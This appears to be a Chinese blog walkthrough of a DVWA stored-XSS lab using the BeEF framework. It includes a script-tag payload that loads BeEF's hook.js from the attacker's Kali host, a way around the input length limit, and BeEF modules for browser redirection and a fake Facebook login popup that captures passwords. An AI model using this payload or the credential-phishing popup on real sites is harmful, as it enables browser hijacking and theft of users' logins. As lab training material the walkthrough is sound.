DVWA-XSS(Stored)-beef

用Low Level来测试beef的使用

beef配置

如果kali没有beef的,进行下载

bash 复制代码
apt install beef-xss

使用

bash 复制代码
beef-xss         # 命令方式启动
beef-xss-stop    # 命令方式关闭 
systemctl start beef-xss.service   #开启beefsystemctl 
stop beef-xss.service     #关闭beefsystemctl 
restart beef-xss.service  #重启beef

打开beef web界面

beef连接

拿Low Level 的xss漏洞测试

beef hook.js的链接为:http://192.168.20.145:3000/hook.js 145为kali IP。

输入666<script src="http://192.168.20.145:3000/hook.js"></script>

前端message处,前端做了输入长度限制,用burp抓包或者直接在前端界面修改长度限制都可以。

当客户端打开界面时192.168.20.1主机上线。(打开浏览器界面的主机会上线)

beef功能

Details:受害者浏览器信息

Logs:记录浏览器操作记录

Commands:向受害者发送指令的模块

下面记录几个功能

  1. 页面重定向

    选中Redirect Browser模块,右侧输入想要跳转到的网址

  2. 弹窗

    Pretty Theft模块,Dislog Type可以选择不同弹窗,这里用facebook做演示,Custom Log处选kali的IP。

    弹窗,输入账号密码。

    在beef的history处可以查看账号密码。

相关推荐
杰哥在此1 天前
Java面试题:解释跨站脚本攻击(XSS)的原理,并讨论如何防范
java·开发语言·面试·编程·xss
今天是 几 号1 天前
WEB攻防-XSS跨站&反射型&存储型&DOM型&标签闭合&输入输出&JS代码解析
前端·javascript·xss
是小王同学啊~1 天前
防止跨站脚本攻击XSS之Antisamy
web安全·xss
都适、隶仁ミ2 天前
常见漏洞之XSS
运维·服务器·开发语言·前端·javascript·安全·xss
愿听风成曲6 天前
5.XSS-反射型(post)利用:获取cookie
前端·xss·cookie
墨鸦_Cormorant9 天前
XSS 安全漏洞介绍及修复方案
安全·web安全·xss
归去来兮-zangcc11 天前
【BSCP系列第2期】XSS攻击的深度剖析和利用(文末送书)
安全·web安全·网络安全·渗透测试·xss·bscp
群联云防护筱筱11 天前
XSS跨站脚本攻击对网站有哪些危害
前端·网络·安全·ddos·xss
蜗牛学苑_武汉11 天前
XSS跨站攻击漏洞
xss